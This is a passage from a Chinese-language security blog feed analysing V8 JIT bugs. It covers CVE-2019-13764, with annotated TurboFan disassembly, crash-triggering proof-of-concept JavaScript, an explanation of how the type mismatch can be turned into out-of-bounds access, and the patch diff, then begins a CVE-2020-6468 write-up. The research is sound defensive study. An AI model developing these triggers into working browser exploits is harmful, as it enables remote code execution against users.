class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">0x118a80d82e20</span>     <span class="number">0</span>  488d1df9ffffff       REX<span class="number">.</span>W leaq <span class="built_in">rbx</span>,[<span class="built_in">rip</span>+<span class="number">0xfffffff9</span>]</span><br><span class="line"><span class="number">0x118a80d82e27</span>     <span class="number">7</span>  483bd9               REX<span class="number">.</span>W cmpq <span class="built_in">rbx</span>,<span class="built_in">rcx</span></span><br><span class="line"><span class="number">0x118a80d82e2a</span>     a  <span class="number">7418</span>                 <span class="keyword">jz</span> <span class="number">0x118a80d82e44</span>  &lt;+<span class="number">0x24</span>&gt;</span><br><span class="line"><span class="number">0x118a80d82e2c</span>     c  48ba0000000036000000 REX<span class="number">.</span>W <span class="keyword">movq</span> <span class="built_in">rdx</span>,<span class="number">0x3600000000</span></span><br><span class="line"><span class="number">0x118a80d82e36</span>    <span class="number">16</span>  49ba803d5202157f0000 REX<span class="number">.</span>W <span class="keyword">movq</span> <span class="built_in">r10</span>,<span class="number">0x7f1502523d80</span>  (Abort)    <span class="comment">;; off heap target</span></span><br><span class="line"><span class="number">0x118a80d82e40</span>    <span class="number">20</span>  41ffd2               <span class="keyword">call</span> <span class="built_in">r10</span></span><br><span class="line"><span class="number">0x118a80d82e43</span>    <span class="number">23</span>  cc                   int3l</span><br><span class="line"><span class="number">0x118a80d82e44</span>    <span class="number">24</span>  488b59e0             REX<span class="number">.</span>W <span class="keyword">movq</span> <span class="built_in">rbx</span>,[<span class="built_in">rcx</span>-<span class="number">0x20</span>]</span><br><span class="line"><span class="number">0x118a80d82e48</span>    <span class="number">28</span>  f6430f01             testb [<span class="built_in">rbx</span>+<span class="number">0xf</span>],<span class="number">0x1</span></span><br><span class="line"><span class="number">0x118a80d82e4c</span>    2c  <span class="number">740d</span>                 <span class="keyword">jz</span> <span class="number">0x118a80d82e5b</span>  &lt;+<span class="number">0x3b</span>&gt;</span><br><span class="line"><span class="number">0x118a80d82e4e</span>    2e  49bac0914602157f0000 REX<span class="number">.</span>W <span class="keyword">movq</span> <span class="built_in">r10</span>,<span class="number">0x7f15024691c0</span>  (CompileLazyDeoptimizedCode)    <span class="comment">;; off heap target</span></span><br><span class="line"><span class="number">0x118a80d82e58</span>    <span class="number">38</span>  41ffe2               <span class="keyword">jmp</span> <span class="built_in">r10</span></span><br><span class="line"><span class="number">0x118a80d82e5b</span>    3b  <span class="number">55</span>                   <span class="keyword">push</span> <span class="built_in">rbp</span></span><br><span class="line"><span class="number">0x118a80d82e5c</span>    3c  4889e5               REX<span class="number">.</span>W <span class="keyword">movq</span> <span class="built_in">rbp</span>,<span class="built_in">rsp</span></span><br><span class="line"><span class="number">0x118a80d82e5f</span>    3f  <span class="number">56</span>                   <span class="keyword">push</span> <span class="built_in">rsi</span></span><br><span class="line"><span class="number">0x118a80d82e60</span>    <span class="number">40</span>  <span class="number">57</span>                   <span class="keyword">push</span> <span class="built_in">rdi</span></span><br><span class="line"><span class="number">0x118a80d82e61</span>    <span class="number">41</span>  48ba0000000022000000 REX<span class="number">.</span>W <span class="keyword">movq</span> <span class="built_in">rdx</span>,<span class="number">0x2200000000</span></span><br><span class="line"><span class="number">0x118a80d82e6b</span>    4b  4c8b15c6ffffff       REX<span class="number">.</span>W <span class="keyword">movq</span> <span class="built_in">r10</span>,[<span class="built_in">rip</span>+<span class="number">0xffffffc6</span>]</span><br><span class="line"><span class="number">0x118a80d82e72</span>    <span class="number">52</span>  41ffd2               <span class="keyword">call</span> <span class="built_in">r10</span></span><br><span class="line"><span class="number">0x118a80d82e75</span>    <span class="number">55</span>  cc                   int3l</span><br><span class="line">---------------------------------------- Main Code ------------------------------------------------</span><br><span class="line"><span class="number">0x118a80d82e76</span>    <span class="number">56</span>  4883ec08             REX<span class="number">.</span>W subq <span class="built_in">rsp</span>,<span class="number">0x8</span></span><br><span class="line"><span class="number">0x118a80d82e7a</span>    5a  488975b0             REX<span class="number">.</span>W <span class="keyword">movq</span> [<span class="built_in">rbp</span>-<span class="number">0x50</span>],<span class="built_in">rsi</span></span><br><span class="line"><span class="number">0x118a80d82e7e</span>    5e  488b55d8             REX<span class="number">.</span>W <span class="keyword">movq</span> <span class="built_in">rdx</span>,[<span class="built_in">rbp</span>-<span class="number">0x28</span>]</span><br><span class="line"><span class="number">0x118a80d82e82</span>    <span class="number">62</span>  f6c201               testb <span class="built_in">rdx</span>,<span class="number">0x1</span></span><br><span class="line"><span class="number">0x118a80d82e85</span>    <span class="number">65</span>  0f859a000000         <span class="keyword">jnz</span> <span class="number">0x118a80d82f25</span>  &lt;+<span class="number">0x105</span>&gt;</span><br><span class="line"><span class="number">0x118a80d82e8b</span>    6b  48b90000000010270000 REX<span class="number">.</span>W <span class="keyword">movq</span> <span class="built_in">rcx</span>,<span class="number">0x271000000000</span></span><br><span class="line"><span class="number">0x118a80d82e95</span>    <span class="number">75</span>  483bd1               REX<span class="number">.</span>W cmpq <span class="built_in">rdx</span>,<span class="built_in">rcx</span></span><br><span class="line"><span class="number">0x118a80d82e98</span>    <span class="number">78</span>  0f8c0b000000         <span class="keyword">jl</span> <span class="number">0x118a80d82ea9</span>  &lt;+<span class="number">0x89</span>&gt;</span><br><span class="line"><span class="number">0x118a80d82e9e</span>    7e  498b4520             REX<span class="number">.</span>W <span class="keyword">movq</span> <span class="built_in">rax</span>,[<span class="built_in">r13</span>+<span class="number">0x20</span>] (root (undefined_value))</span><br><span class="line"><span class="number">0x118a80d82ea2</span>    <span class="number">82</span>  488be5               REX<span class="number">.</span>W <span class="keyword">movq</span> <span class="built_in">rsp</span>,<span class="built_in">rbp</span></span><br><span class="line"><span class="number">0x118a80d82ea5</span>    <span class="number">85</span>  <span class="number">5d</span>                   <span class="keyword">pop</span> <span class="built_in">rbp</span></span><br><span class="line"><span class="number">0x118a80d82ea6</span>    <span class="number">86</span>  c20800               <span class="keyword">ret</span> <span class="number">0x8</span></span><br><span class="line">---------------------------------------- Deopt Code ---------------------------------------------</span><br><span class="line"><span class="number">0x118a80d82ea9</span>    <span class="number">89</span>  493b65e0             REX<span class="number">.</span>W cmpq <span class="built_in">rsp</span>,[<span class="built_in">r13</span>-<span class="number">0x20</span>] (external value (StackGuard::address_of_jslimit()))</span><br><span class="line"><span class="number">0x118a80d82ead</span>    <span class="number">8d</span>  0f8629000000         <span class="keyword">jna</span> <span class="number">0x118a80d82edc</span>  &lt;+<span class="number">0xbc</span>&gt;</span><br><span class="line"><span class="number">0x118a80d82eb3</span>    <span class="number">93</span>  48b979fa19a6632d0000 REX<span class="number">.</span>W <span class="keyword">movq</span> <span class="built_in">rcx</span>,<span class="number">0x2d63a619fa79</span>    <span class="comment">;; object: 0x2d63a619fa79  从此处开始进入循环</span></span><br><span class="line"><span class="number">0x118a80d82ebd</span>    <span class="number">9d</span>  48bf39d619a6632d0000 REX<span class="number">.</span>W <span class="keyword">movq</span> <span class="built_in">rdi</span>,<span class="number">0x2d63a619d639</span>    <span class="comment">;; object: 0x2d63a619d639  value=0x2d63a619fa79 &gt;</span></span><br><span class="line"><span class="number">0x118a80d82ec7</span>    a7  48394f17             REX<span class="number">.</span>W cmpq [<span class="built_in">rdi</span>+<span class="number">0x17</span>],<span class="built_in">rcx</span></span><br><span class="line"><span class="number">0x118a80d82ecb</span>    ab  0f8560000000         <span class="keyword">jnz</span> <span class="number">0x118a80d82f31</span>  &lt;+<span class="number">0x111</span>&gt;</span><br><span class="line"><span class="number">0x118a80d82ed1</span>    b1  493b65e0             REX<span class="number">.</span>W cmpq <span class="built_in">rsp</span>,[<span class="built_in">r13</span>-<span class="number">0x20</span>] (external value (StackGuard::address_of_jslimit()))</span><br><span class="line"><span class="number">0x118a80d82ed5</span>    b5  0f862a000000         <span class="keyword">jna</span> <span class="number">0x118a80d82f05</span>  &lt;+<span class="number">0xe5</span>&gt;</span><br><span class="line"><span class="number">0x118a80d82edb</span>    bb  cc                   int3l                            <span class="comment">;; 由于始终无法满足当前代码段的各个跳出循环的条件，因此将频繁触发此处的断点</span></span><br><span class="line"><span class="number">0x118a80d82edc</span>    bc  48bb307ba501157f0000 REX<span class="number">.</span>W <span class="keyword">movq</span> <span class="built_in">rbx</span>,<span class="number">0x7f1501a57b30</span>    <span class="comment">;; external reference (Runtime::StackGuard)</span></span><br><span class="line"><span class="number">0x118a80d82ee6</span>    c6  33c0                 xorl <span class="built_in">rax</span>,<span class="built_in">rax</span></span><br><span class="line"><span class="number">0x118a80d82ee8</span>    c8  48be311818a6632d0000 REX<span class="number">.</span>W <span class="keyword">movq</span> <span class="built_in">rsi</span>,<span class="number">0x2d63a6181831</span>    <span class="comment">;; object: 0x2d63a6181831 </span></span><br><span class="line"><span class="number">0x118a80d82ef2</span>    d2  49baa0de7302157f0000 REX<span class="number">.</span>W <span class="keyword">movq</span> <span class="built_in">r10</span>,<span class="number">0x7f150273dea0</span>  (CEntry_Return1_DontSaveFPRegs_ArgvOnStack_NoBuiltinExit)    <span class="comment">;; off heap target</span></span><br><span class="line"><span class="number">0x118a80d82efc</span>    dc  41ffd2               <span class="keyword">call</span> <span class="built_in">r10</span></span><br><span class="line"><span class="number">0x118a80d82eff</span>    df  488b55d8             REX<span class="number">.</span>W <span class="keyword">movq</span> <span class="built_in">rdx</span>,[<span class="built_in">rbp</span>-<span class="number">0x28</span>]</span><br><span class="line"><span class="number">0x118a80d82f03</span>    e3  ebae                 <span class="keyword">jmp</span> <span class="number">0x118a80d82eb3</span>  &lt;+<span class="number">0x93</span>&gt;      <span class="comment">;; 跳转回上面的代码</span></span><br><span class="line"><span class="number">0x118a80d82f05</span>    e5  488b1dd2ffffff       REX<span class="number">.</span>W <span class="keyword">movq</span> <span class="built_in">rbx</span>,[<span class="built_in">rip</span>+<span class="number">0xffffffd2</span>]</span><br><span class="line"><span class="number">0x118a80d82f0c</span>    ec  33c0                 xorl <span class="built_in">rax</span>,<span class="built_in">rax</span></span><br><span class="line"><span class="number">0x118a80d82f0e</span>    ee  48be311818a6632d0000 REX<span class="number">.</span>W <span class="keyword">movq</span> <span class="built_in">rsi</span>,<span class="number">0x2d63a6181831</span>    <span class="comment">;; object: 0x2d63a6181831 </span></span><br><span class="line"><span class="number">0x118a80d82f18</span>    f8  4c8b15d5ffffff REX<span class="number">.</span>W <span class="keyword">movq</span> <span class="built_in">r10</span>,[<span class="built_in">rip</span>+<span class="number">0xffffffd5</span>]</span><br><span class="line"><span class="number">0x118a80d82f1f</span>    ff  41ffd2               <span class="keyword">call</span> <span class="built_in">r10</span></span><br><span class="line"><span class="number">0x118a80d82f22</span>   <span class="number">102</span>  ebb7                 <span class="keyword">jmp</span> <span class="number">0x118a80d82edb</span>  &lt;+<span class="number">0xbb</span>&gt;</span><br><span class="line"><span class="number">0x118a80d82f24</span>   <span class="number">104</span>  <span class="number">90</span>                   <span class="keyword">nop</span></span><br><span class="line"><span class="number">0x118a80d82f25</span>   <span class="number">105</span>  49c7c500000000       REX<span class="number">.</span>W <span class="keyword">movq</span> <span class="built_in">r13</span>,<span class="number">0x0</span>      <span class="comment">;; de<span class="doctag">bug:</span> deopt position, script offset &#x27;170&#x27;</span></span><br><span class="line">                                                                   <span class="comment">;; de<span class="doctag">bug:</span> deopt position, inlining id &#x27;-1&#x27;</span></span><br><span class="line">                                                                   <span class="comment">;; debug: deopt reason &#x27;not a Smi&#x27;</span></span><br><span class="line">                                                                   <span class="comment">;; debug: deopt index 0</span></span><br><span class="line"><span class="number">0x118a80d82f2c</span>   10c  e80ff10300           <span class="keyword">call</span> <span class="number">0x118a80dc2040</span>     <span class="comment">;; eager deoptimization bailout</span></span><br><span class="line"><span class="number">0x118a80d82f31</span>   <span class="number">111</span>  49c7c501000000       REX<span class="number">.</span>W <span class="keyword">movq</span> <span class="built_in">r13</span>,<span class="number">0x1</span>      <span class="comment">;; de<span class="doctag">bug:</span> deopt position, script offset &#x27;190&#x27;</span></span><br><span class="line">                                                                   <span class="comment">;; de<span class="doctag">bug:</span> deopt position, inlining id &#x27;-1&#x27;</span></span><br><span class="line">                                                                   <span class="comment">;; debug: deopt reason &#x27;wrong call target&#x27;</span></span><br><span class="line">                                                                   <span class="comment">;; debug: deopt index 1</span></span><br><span class="line"><span class="number">0x118a80d82f38</span>   <span class="number">118</span>  e803f10300           <span class="keyword">call</span> <span class="number">0x118a80dc2040</span>     <span class="comment">;; eager deoptimization bailout</span></span><br><span class="line"><span class="number">0x118a80d82f3d</span>   <span class="number">11d</span>  49c7c502000000       REX<span class="number">.</span>W <span class="keyword">movq</span> <span class="built_in">r13</span>,<span class="number">0x2</span>      <span class="comment">;; de<span class="doctag">bug:</span> deopt position, script offset &#x27;152&#x27;</span></span><br><span class="line">                                                                   <span class="comment">;; de<span class="doctag">bug:</span> deopt position, inlining id &#x27;-1&#x27;</span></span><br><span class="line">                                                                   <span class="comment">;; debug: deopt reason &#x27;(unknown)&#x27;</span></span><br><span class="line">                                                                   <span class="comment">;; debug: deopt index 2</span></span><br><span class="line"><span class="number">0x118a80d82f44</span>   <span class="number">124</span>  e8f7f00700           <span class="keyword">call</span> <span class="number">0x118a80e02040</span>     <span class="comment">;; lazy deoptimization bailout</span></span><br><span class="line"><span class="number">0x118a80d82f49</span>   <span class="number">129</span>  49c7c503000000       REX<span class="number">.</span>W <span class="keyword">movq</span> <span class="built_in">r13</span>,<span class="number">0x3</span>      <span class="comment">;; de<span class="doctag">bug:</span> deopt position, script offset &#x27;37&#x27;</span></span><br><span class="line">                                                                   <span class="comment">;; de<span class="doctag">bug:</span> deopt position, inlining id &#x27;0&#x27;</span></span><br><span class="line">                                                                   <span class="comment">;; debug: deopt reason &#x27;(unknown)&#x27;</span></span><br><span class="line">                                                                   <span class="comment">;; debug: deopt index 3</span></span><br><span class="line"><span class="number">0x118a80d82f50</span>   <span class="number">130</span>  e8ebf00700           <span class="keyword">call</span> <span class="number">0x118a80e02040</span>     <span class="comment">;; lazy deoptimization bailout</span></span><br><span class="line"><span class="number">0x118a80d82f55</span>   <span class="number">135</span>  0f1f00               <span class="keyword">nop</span></span><br></pre></td></tr></table></figure></li><li><p>Issue 中给出的 Regress 单元测试文件如下（也可以称为PoC）：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">function <span class="title">write</span><span class="params">(begin, end, step)</span> </span>&#123;</span><br><span class="line">  <span class="keyword">for</span> (var i = begin; i &gt;= end; i += step) &#123;</span><br><span class="line">    step = end - begin;</span><br><span class="line">    begin &gt;&gt;&gt;= <span class="number">805306382</span>;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function">function <span class="title">bar</span><span class="params">()</span> </span>&#123;</span><br><span class="line">  <span class="keyword">for</span> (let i = <span class="number">0</span>; i &lt; <span class="number">10000</span>; i++) &#123;</span><br><span class="line">    <span class="built_in">write</span>(Infinity, <span class="number">1</span>, <span class="number">1</span>);</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">%<span class="built_in">PrepareFunctionForOptimization</span>(write);</span><br><span class="line">%<span class="built_in">PrepareFunctionForOptimization</span>(bar);</span><br><span class="line"><span class="built_in">bar</span>();</span><br><span class="line">%<span class="built_in">OptimizeFunctionOnNextCall</span>(bar);</span><br><span class="line"><span class="built_in">bar</span>();</span><br></pre></td></tr></table></figure><p>成功触发 SIGTRAP：</p><p><img src="/2021/02/CVE-2019-13764/sigtrap.png" alt="img"></p><p>查看Turbolizer，可以发现这个归纳变量 <code>i</code> 的范围为 <code>-inf ~ inf</code></p><blockquote><p>一个循环内部会有多个 Phi 结点，以PoC为例，由于变量begin、i、step的值分别从循环内部和循环外部的数据流流入，因此是 Phi 类型的结点。</p></blockquote><p><img src="/2021/02/CVE-2019-13764/phi1.png" alt="img"><br>详细输出如下。可以看到 bound_type、initial_type 以及 increment_type 的范围与我们所预期的相符，因为 bound value 和 initial value 分别是传入 write 函数的 <code>1</code> 和 <code>Infinity</code>，而 increment value 为 $1 -  inf = -inf$。但归纳变量 <code>i</code> 的范围却错误的设置为 <code>-inf ~ inf</code>，而不是 <code>inf ~ inf</code>。</p><p>同时我们还可以注意到此时的 <code>initial_type value + increment_type value = inf + (-inf) = NaN</code></p><blockquote><p>以下部分输出，是打patch后的输出结果。</p></blockquote><p><img src="/2021/02/CVE-2019-13764/output.png" alt="img"></p></li><li><p>理解完上面的漏洞原理后，我们便可以略微修改一下Poc，更加进一步的理解到其中的细节：</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">write</span>(<span class="params">step</span>) &#123;</span><br><span class="line">  step = -<span class="title class_">Infinity</span>;</span><br><span class="line">  <span class="comment">/*</span></span><br><span class="line"><span class="comment">    initial_type   range =&gt; inf ~ inf</span></span><br><span class="line"><span class="comment">    bounds_type    range =&gt; 1 ~ 1</span></span><br><span class="line"><span class="comment">    increment_type range =&gt; -inf ~ inf</span></span><br><span class="line"><span class="comment">    =&gt; i           range =&gt; -inf ~ inf</span></span><br><span class="line"><span class="comment">  */</span></span><br><span class="line">  <span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="title class_">Infinity</span>; i &gt;= <span class="number">1</span>; i += -<span class="title class_">Infinity</span>) &#123;&#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">bar</span>(<span class="params"></span>) &#123;</span><br><span class="line">  <span class="keyword">for</span> (<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; <span class="number">10000</span>; i++) &#123;</span><br><span class="line">    <span class="title function_">write</span>(<span class="number">1</span>);</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">%<span class="title class_">PrepareFunctionForOptimization</span>(write);</span><br><span class="line">%<span class="title class_">PrepareFunctionForOptimization</span>(bar);</span><br><span class="line"><span class="title function_">bar</span>();</span><br><span class="line">%<span class="title class_">OptimizeFunctionOnNextCall</span>(bar);</span><br><span class="line"><span class="title function_">bar</span>();</span><br></pre></td></tr></table></figure></li></ul><h2 id="四、漏洞利用">四、漏洞利用</h2><ul><li><p>笔者原本以为这样的漏洞有点鸡肋，但直到又遇上了这个漏洞的子漏洞 - <a href="https://bugs.chromium.org/p/chromium/issues/detail?id=1051017">Issue 1051017: Security: Type inference issue in Typer::Visitor::TypeInductionVariablePhi</a></p><p>这里只简单的说一下，通过简单的绕过，我们可以使 InductionVariable 的值为 NaN，但 type 为 kInterger。这样就会导致 turboFan 推测的类型与实际类型不符。于是我们可以根据这个来编写 exp 达到 OOB 的目的。</p><p>由于之前的补丁修改了 checkBounds 的优化机制，因此我们没有办法再通过优化 checkBounds 来进行越界读写。但我们可以利用 <code>ReduceJSCreateArray</code>的优化机制进行越界读写，具体原因是，该函数将使用 length 的<strong>推测值</strong>来分配 backing_store 的大小，但只会在运行时将 length 的<strong>运行时值</strong>赋值到该数组的 length 字段。如果 length 的<strong>推测值</strong>小于<strong>运行时值</strong>，那就可以进行 OOB。</p></li><li><p>更具体地细节可以进入上面 Isuue 链接中学习，由于 Issue 中利用细节较为详尽，因此此处不再赘述。</p></li></ul><h2 id="五、后记">五、后记</h2><ul><li><p>漏洞修复见如下链接 - <a href="https://chromium.googlesource.com/v8/v8.git/+/b8b6075021ade0969c6b8de9459cd34163f7dbe1%5E%21/#F1">revision</a>，其中增加了对 NaN 的检测。</p><p>如果 initial_type 和 increment_type 相加后为 NaN ，则将当前分析回退至更保守的 Phi 类型处理。</p><blockquote><p>需要注意的是，该补丁仍然没有包含所有可能的 NaN 情况。具体请看 <a href="https://bugs.chromium.org/p/chromium/issues/detail?id=1051017">Issue 1051017: Security: Type inference issue in Typer::Visitor::TypeInductionVariablePhi</a></p></blockquote><figure class="highlight diff"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@@ -847,13 +847,30 @@</span></span><br><span class="line">   DCHECK_EQ(IrOpcode::kLoop, NodeProperties::GetControlInput(node)-&gt;opcode());</span><br><span class="line">   DCHECK_EQ(2, NodeProperties::GetControlInput(node)-&gt;InputCount());</span><br><span class="line"> </span><br><span class="line"><span class="addition">+  auto res = induction_vars_-&gt;induction_variables().find(node-&gt;id());</span></span><br><span class="line"><span class="addition">+  DCHECK(res != induction_vars_-&gt;induction_variables().end());</span></span><br><span class="line"><span class="addition">+  InductionVariable* induction_var = res-&gt;second;</span></span><br><span class="line"><span class="addition">+  InductionVariable::ArithmeticType arithmetic_type = induction_var-&gt;Type();</span></span><br><span class="line">   Type initial_type = Operand(node, 0);</span><br><span class="line">   Type increment_type = Operand(node, 2);</span><br><span class="line"> </span><br><span class="line"><span class="addition">+  const bool both_types_integer = initial_type.Is(typer_-&gt;cache_-&gt;kInteger) &amp;&amp;</span></span><br><span class="line"><span class="addition">+                                  increment_type.Is(typer_-&gt;cache_-&gt;kInteger);</span></span><br><span class="line">   // 增加了对 NaN 的判断</span><br><span class="line"><span class="addition">+  bool maybe_nan = false;</span></span><br><span class="line"><span class="addition">+  // The addition or subtraction could still produce a NaN, if the integer</span></span><br><span class="line"><span class="addition">+  // ranges touch infinity.</span></span><br><span class="line"><span class="addition">+  if (both_types_integer) &#123;</span></span><br><span class="line"><span class="addition">+    Type resultant_type =</span></span><br><span class="line"><span class="addition">+        (arithmetic_type == InductionVariable::ArithmeticType::kAddition)</span></span><br><span class="line"><span class="addition">+            ? typer_-&gt;operation_typer()-&gt;NumberAdd(initial_type, increment_type)</span></span><br><span class="line"><span class="addition">+            : typer_-&gt;operation_typer()-&gt;NumberSubtract(initial_type,</span></span><br><span class="line"><span class="addition">+                                                        increment_type);</span></span><br><span class="line"><span class="addition">+    maybe_nan = resultant_type.Maybe(Type::NaN());</span></span><br><span class="line"><span class="addition">+  &#125;</span></span><br><span class="line"><span class="addition">+</span></span><br><span class="line">   // We only handle integer induction variables (otherwise ranges</span><br><span class="line">   // do not apply and we cannot do anything).</span><br><span class="line"><span class="deletion">-  if (!initial_type.Is(typer_-&gt;cache_-&gt;kInteger) ||</span></span><br><span class="line"><span class="deletion">-      !increment_type.Is(typer_-&gt;cache_-&gt;kInteger)) &#123;</span></span><br><span class="line">   // 增加了对 NaN 的处理，对于 NaN 这种情况，使用保守方式进行处理。</span><br><span class="line"><span class="addition">+  if (!both_types_integer || maybe_nan) &#123;</span></span><br><span class="line">     // Fallback to normal phi typing, but ensure monotonicity.</span><br><span class="line">     // (Unfortunately, without baking in the previous type, monotonicity might</span><br><span class="line">     // be violated because we might not yet have retyped the incrementing</span><br><span class="line"><span class="meta">@@ -874,12 +891,6 @@</span></span><br><span class="line">   &#125;</span><br><span class="line"> </span><br><span class="line">   // Now process the bounds.</span><br><span class="line"><span class="deletion">-  auto res = induction_vars_-&gt;induction_variables().find(node-&gt;id());</span></span><br><span class="line"><span class="deletion">-  DCHECK(res != induction_vars_-&gt;induction_variables().end());</span></span><br><span class="line"><span class="deletion">-  InductionVariable* induction_var = res-&gt;second;</span></span><br><span class="line"><span class="deletion">-</span></span><br><span class="line"><span class="deletion">-  InductionVariable::ArithmeticType arithmetic_type = induction_var-&gt;Type();</span></span><br><span class="line"><span class="deletion">-</span></span><br><span class="line">   double min = -V8_INFINITY;</span><br><span class="line">   double max = V8_INFINITY;</span><br></pre></td></tr></table></figure></li></ul><h2 id="六、参考">六、参考</h2><ul><li><p><a href="https://bugs.chromium.org/p/chromium/issues/detail?id=1028863">Issue 1028863: v8: Wrong JIT code that triggers SIGTRAP at runtime</a></p></li><li><p><a href="https://bugs.chromium.org/p/chromium/issues/detail?id=1051017">Issue 1051017: Security: Type inference issue in Typer::Visitor::TypeInductionVariablePhi</a></p></li></ul>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、前言&quot;&gt;一、前言&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;CVE-2019-13764 是 v8 中的一个位于  JIT TyperPhase  &lt;code&gt;TypeInductionVariablePhi&lt;/code&gt; 函数的漏洞。我们可以通过这个例子简单学习一下 TyperPhase 中对 InductionVariablePhi 的处理方式，以及越界读取构造方式。&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;复现用的 v8 版本为 &lt;code&gt;7.8.279.23&lt;/code&gt;（chromium 78.0.3904.108） 。&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;</summary>
    
    
    
    <category term="vulnerability analysis" scheme="https://kiprey.github.io/categories/vulnerability-analysis/"/>
    
    <category term="v8" scheme="https://kiprey.github.io/categories/vulnerability-analysis/v8/"/>
    
    
    <category term="v8" scheme="https://kiprey.github.io/tags/v8/"/>
    
  </entry>
  
  <entry>
    <title>CVE-2020-6468 分析</title>
    <link href="https://kiprey.github.io/2021/02/CVE-2020-6468/"/>
    <id>https://kiprey.github.io/2021/02/CVE-2020-6468/</id>
    <published>2021-02-09T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:39.765Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、前言">一、前言</h2><ul><li><p>CVE-2020-6468 是 v8 中的一个位于 <code>DeadCodeElimination::ReduceDeoptimizeOrReturnOrTerminateOrTailCall</code> 函数的 JIT 漏洞。通过该漏洞攻击者可<strong>触发类型混淆</strong>并<strong>修改数组的长度</strong>，这会导致<strong>任意越界读写</strong>并可进一步达到 <strong>RCE</strong>。</p><p>具体的说，就是可以在 CheckMaps 结点前向目标对象内部写入 -1，在被认出对象类型前成功修改数组长度。</p></li><li><p>测试用的 v8 版本为 <code>8.1.307</code> 。</p></li></ul><span id="more"></span><ul><li>由于这是笔者初次学习 JIT 中的 type confusion漏洞，因此可能会存在错误或一些较为模糊的地方，如有问题还请师傅们斧正。</li></ul><h2 id="二、环境搭建">二、环境搭建</h2><ul><li><p>切换 v8 版本，然后编译：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">git checkout 8.1.307</span><br><span class="line">gclient <span class="built_in">sync</span></span><br><span class="line">tools/dev/v8gen.py x64.debug</span><br><span class="line">ninja -C out.gn/x64.debug  </span><br></pre></td></tr></table></figure></li><li><p>启动 turbolizer。如果原先版本的 turbolizer 无法使用，则可以使用在线版本的 turbolizer <a href="https://v8.github.io/tools/v8.1/turbolizer/index.html">v8.1</a></p><blockquote><p>v8 tools 的根目录在 <a href="https://v8.github.io/tools">此处</a></p></blockquote></li></ul><h2 id="三、漏洞细节">三、漏洞细节</h2><h3 id="1-前置知识">1. 前置知识</h3><h4 id="a-PrepareFunctionForOptimization">a. %PrepareFunctionForOptimization</h4><ul><li><p>v8 中内置了一些 runtime 函数，可以在启动 d8 时追加<code>--allow-natives-syntax</code>参数来启动内置函数的使用。</p></li><li><p><code>%PrepareFunctionForOptimization</code> 是 v8 众多内置函数中的其中一个。该函数可以为 JIT 优化函数前做准备，确保 JSFunction 存在 FeedbackVector等相关的结构（在必要时甚至会先编译该函数）。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 调用链如下</span></span><br><span class="line"><span class="function">Runtime_PrepareFunctionForOptimization</span></span><br><span class="line"><span class="function">  <span class="type">bool</span> <span class="title">EnsureFeedbackVector</span><span 